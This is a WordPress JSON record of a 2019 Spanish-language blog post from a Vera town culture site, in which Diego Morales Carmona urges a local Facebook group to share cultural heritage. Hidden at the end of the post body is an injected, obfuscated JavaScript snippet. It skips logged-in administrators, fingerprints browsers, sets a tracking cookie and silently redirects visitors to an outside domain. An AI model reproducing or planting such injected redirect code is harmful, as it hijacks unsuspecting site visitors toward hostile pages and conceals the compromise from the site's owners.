{"id":3916,"date":"2019-02-08T08:51:13","date_gmt":"2019-02-08T08:51:13","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=3916"},"modified":"2019-02-11T09:32:46","modified_gmt":"2019-02-11T09:32:46","slug":"reflexiones-satirico-politicas-diego-morales-carmona","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2019\/02\/08\/reflexiones-satirico-politicas-diego-morales-carmona\/","title":{"rendered":"REFLEXIONES SAT\u00cdRICO-POL\u00cdTICAS. DIEGO MORALES CARMONA"},"content":{"rendered":"<p>Reflexiones<\/p>\n<p><!--more--><\/p>\n<p style=\"text-align: right\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/diego-morales-carmona.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-3837\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/diego-morales-carmona-250x300.jpg\" alt=\"\" width=\"250\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/diego-morales-carmona-250x300.jpg 250w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/diego-morales-carmona.jpg 425w\" sizes=\"(max-width: 250px) 100vw, 250px\" \/><\/a><\/p>\n<p style=\"text-align: right\">Diego Morales Carmona<\/p>\n<p>REFLEXIONES SAT\u00cdRICO-POL\u00cdTICAS (publicado en <em>No eres de Vera si&#8230;<\/em> -facebook-)<\/p>\n<p>\u00bfQu\u00e9 est\u00e1s pensando me pregunta facebook? Pues bien, a mis lectores y tambi\u00e9n detractores, hoy, guste o no, voy a hablar con todo rigor y ferviente pasi\u00f3n, amigos, de POL\u00cdTICA, con may\u00fasculas. Me encanta, m\u00e1xime en los momentos actuales.<br \/>\nConcib\u00e1mosla \u00e9sta, elucubrando, desde el sarcasmo y la iron\u00eda. Acerqu\u00e9monos, por tanto, a esos grandes poetas del Siglo de Oro: Quevedo, conceptista; y G\u00f3ngora, culterano. As\u00ed, insisto, hoy, la pol\u00edtica quiero interpretarla yo, desde mi profundo pensamiento, en referencia a esa rivalidad literaria entre sendos contendientes<br \/>\nenamorados de la cultura.<br \/>\nUno, conciso y amante del concepto; otro, ampuloso, culterano. Grandes por su ingenio los dos, adversarios y enemigos desde su condici\u00f3n de amantes de la sapiencia literaria;<br \/>\nadem\u00e1s, elocuentes, vibrantes, grandes&#8230;<br \/>\nAs\u00ed interpreto yo, desde ese punto de vista, la pol\u00edtica para dar a conocer nuestros pensamientos e ideales como arte en lo que todo es posible; pero mi postulado y reflexi\u00f3n no va por ah\u00ed; va por otros derroteros: expandir la cultura, difundirla y expresarla en este Grupo de 4600 seguidores, titulado No eres de Vera si&#8230;en el que, con nuestras aportaciones y comentarios, enriquezcamos m\u00e1s nuestro variado y vasto patrimonio cultural con un volumen documental altamente impresionante. Amigos, hablen con nuestro archivero municipal, siempre sol\u00edcito y presto a facilitar informaci\u00f3n<br \/>\na quienes y cuantos lo requieran. \u00c9l sabr\u00e1 dar respuesta a vuestras peticiones.<br \/>\nQue no sean s\u00f3lo tres o cuatro personas las que conduzcan con sus hilos las intervenciones y la existencia de esta p\u00e1gina que podr\u00edamos mejorar. Impr\u00edmanle, queridos amigos, car\u00e1cter; escriban lo que deseen: an\u00e9cdotas, sugerencias, relatos, vicisitudes&#8230;Creemos una p\u00e1gina viva, din\u00e1mica, abierta, activa y, por supuesto, lo m\u00e1s importante: el respeto y perpetuidad a nuestras tradiciones y a aqu\u00e9llos que hicieron de esta maravillosa ciudad su medio de vida a lo largo de su vasta y extensa historia.<br \/>\nGeneraciones venideras, con nuestras aportaciones, documentos y vestigios sujetos a estudio, haciendo intrahistoria no soportar\u00e1n ignorancia supina. De ah\u00ed nuestro trabajo en pro de y aras de la cultura. Vera es un pueblo apto para ser culturizado: tres colegios<br \/>\nde Primaria y dos Institutos.<br \/>\nNo lo olviden, t\u00e9nganlo presente. Vera se merece m\u00e1s y todos podemos contribuir a mejorarla.<br \/>\nDesde estas l\u00edneas, \u00e1nimo y expresen lo que sientan a favor de la cultura y tradici\u00f3n. Bueno, amigos, he llegado al final sin hablar de lo que realmente quer\u00eda: hablar de POL\u00cdTICA. Lo dejaremos para otra ocasi\u00f3n, aunque posiblemente se me prohiba; pero, claro est\u00e1, con todo respeto y, si me lo permiten, con un poco de iron\u00eda y s\u00e1tira como al principio reflejaba sobre esos insignes e ilustres poetas y prosistas de nuestro Siglo de Oro. Un abrazo a este gran Grupo y, concretamente, a mi querido amigo Diego Alonso C\u00e1novas y a los Sres. Administradores.<br \/>\nAutor: Diego Morales Carmona<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Reflexiones<\/p>\n","protected":false},"author":7,"featured_media":3917,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20,2],"tags":[82],"class_list":["post-3916","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboraciones","category-educacion","tag-diego-morales-carmona"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3916","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=3916"}],"version-history":[{"count":5,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3916\/revisions"}],"predecessor-version":[{"id":3922,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3916\/revisions\/3922"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/3917"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=3916"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=3916"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=3916"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}